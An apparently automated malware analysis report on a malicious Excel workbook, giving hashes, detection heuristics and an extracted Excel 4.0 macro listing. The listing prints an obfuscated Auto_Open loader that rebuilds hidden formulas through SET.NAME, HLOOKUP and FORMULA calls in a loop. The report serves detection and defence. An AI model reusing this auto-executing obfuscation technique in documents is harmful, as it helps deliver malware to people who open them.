Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff8abae6794baeba…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2020-11-25 10:43:22
Authoring application: Microsoft Excel
First seen: 2021-01-11
MD5: 9d9f048fbd880101ba6a2601ae71a374
SHA-1: 4c654acef6726c4e358de7ce3543832d14eafe2a
SHA-256: ff8abae6794baeba33c0a91789ac4a053c56c532522b3aaf7915621ded0b5b5a
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (severity: critical, rule: OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (severity: critical, rule: OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6387 bytes
SHA-256: 7eed346c34bd068399342dd4f520d1bb6cf6d5ef0952100356df2acb1b98a60f
Preview of the extracted script (first 1,000 lines):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  jqIH
' 0018     23 LABEL : Cell Value, String Constant - AjtvKkBJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!G133 
' 0018     20 LABEL : Cell Value, String Constant - BOdsq len=0 
' 0018     25 LABEL : Cell Value, String Constant - BXcMvgUJXP len=0 
' 0018     23 LABEL : Cell Value, String Constant - CVcHxBvP len=0 
' 0018     21 LABEL : Cell Value, String Constant - cyGDfd len=0 
' 0018     21 LABEL : Cell Value, String Constant - eaUhza len=0 
' 0018     26 LABEL : Cell Value, String Constant - ECQZgRKRnvI len=0 
' 0018     23 LABEL : Cell Value, String Constant - imnPhEZv len=0 
' 0018     22 LABEL : Cell Value, String Constant - ItZBXbw len=0 
' 0018     21 LABEL : Cell Value, String Constant - KmLNSc len=0 
' 0018     21 LABEL : Cell Value, String Constant - NUqwDW len=0 
' 0018     23 LABEL : Cell Value, String Constant - NZqAIBtt len=0 
' 0018     27 LABEL : Cell Value, String Constant - ovFKIJqMvFuD len=0 
' 0018     22 LABEL : Cell Value, String Constant - PcdsSwn len=0 
' 0018     20 LABEL : Cell Value, String Constant - PjudP len=0 
' 0018     27 LABEL : Cell Value, String Constant - SoxSnbPcFZPb len=0 
' 0018     24 LABEL : Cell Value, String Constant - tMQMkCnhf len=0 
' 0018     25 LABEL : Cell Value, String Constant - XICNaOaWwo len=0 
' 0018     24 LABEL : Cell Value, String Constant - yoejgKgcH len=0 
' 0018     27 LABEL : Cell Value, String Constant - ZoZOZrBIFuxR len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  jqIH,G52,"SET.NAME("ItZBXbw",VALUE("0"))",""
'  jqIH,G54,"SET.NAME("BXcMvgUJXP",ItZBXbw)",""
'  jqIH,G56,"SET.NAME("AjtvKkBJ",ItZBXbw)",""
'  jqIH,G60,"SET.NAME("tMQMkCnhf",COUNTA(cyGDfd))",""
'  jqIH,G63,"SET.NAME("BOdsq",COUNTA(yoejgKgcH))",""
'  jqIH,G67,[],""
'  jqIH,G69,"SET.NAME("CVcHxBvP","")",""
'  jqIH,G72,"BXcMvgUJXP",""
'  jqIH,G76,"SET.NAME("XICNaOaWwo",HLOOKUP("*",cyGDfd,BXcMvgUJXP,FALSE))",""
'  jqIH,G78,"eaUhza",""
'  jqIH,G80,"SET.NAME("ECQZgRKRnvI",ItZBXbw)",""
'  jqIH,G83,[],""
'  jqIH,G88,"ECQZgRKRnvI",""
'  jqIH,G92,"SoxSnbPcFZPb",""
'  jqIH,G97,"NZqAIBtt",""
'  jqIH,G100,"ZoZOZrBIFuxR",""
'  jqIH,G103,"SET.NAME("PcdsSwn",VALUE(HLOOKUP("*",yoejgKgcH,ZoZOZrBIFuxR,FALSE)))",""
'  jqIH,G105,"KmLNSc",""
'  jqIH,G107,"CVcHxBvP",""
'  jqIH,G110,"AjtvKkBJ",""
'  jqIH,G113,NEXT(),""
'  jqIH,G118,"NUqwDW",""
'  jqIH,G121,"SET.NAME("f",INT(T(FORMULA(T(CVcHxBvP)&"",""&T(NUqwDW)))))",""
'  jqIH,G124,"ovFKIJqMvFuD",""
'  jqIH,G129,NEXT(),""
'  jqIH,G131,RETURN(),""
'  jqIH,G154,"SET.NAME("PjudP",G52)",""
'  jqIH,G159,"cyGDfd",""
'  jqIH,G164,"SET.NAME("yoejgKgcH",R51C15)",""
'  jqIH,G166,"SET.NAME("ovFKIJqMvFuD",173)",""
'  jqIH,G169,"SET.NAME("imnPhEZv",7)",""
'  jqIH,G172,PjudP(),""
'  jqIH,G173,HALT(),""